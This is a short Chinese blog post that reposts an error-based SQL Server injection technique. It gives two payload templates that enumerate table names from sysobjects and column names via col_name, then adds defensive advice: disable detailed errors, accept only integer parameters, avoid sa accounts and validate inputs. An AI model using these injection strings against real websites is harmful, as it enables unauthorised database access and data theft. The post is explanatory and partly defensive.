SQL注射攻击
看天魔说CSDN被攻击了,就去看了nb联盟,从小竹原创中看到SQLSERVER注入必殺技,转载之。
必杀技技成功条件:
1.找到注入点
2.数据库为SQLSERVER
3.IIS没屏蔽错误提示注:请不要用于非法用途,否则后果自负。
[N] = 第N个表
ID=1 and (Select top 1 name from(Select top [N] id,name from sysobjects where xtype=char(85)) T order by id desc)>1[T] = 表名
[N] = 第N个字段
ID=1 and (Select Top 1 col_name(object_id('[T]'),[N]) from sysobjects)>1
关闭详细错误提示,应该是对外开放的网站的基本设置。
我觉得还应尽量做到:
1. 参数全部只从 GET 和 POST 中获取,只接受整数型参数。
2. 脚本访问 MSSQL 不使用 sa 级别的账户,另外专门建立,并在 MSSQL 中设置权限使不能查询系统表。
3. 检查每个 Request.Params 的格式。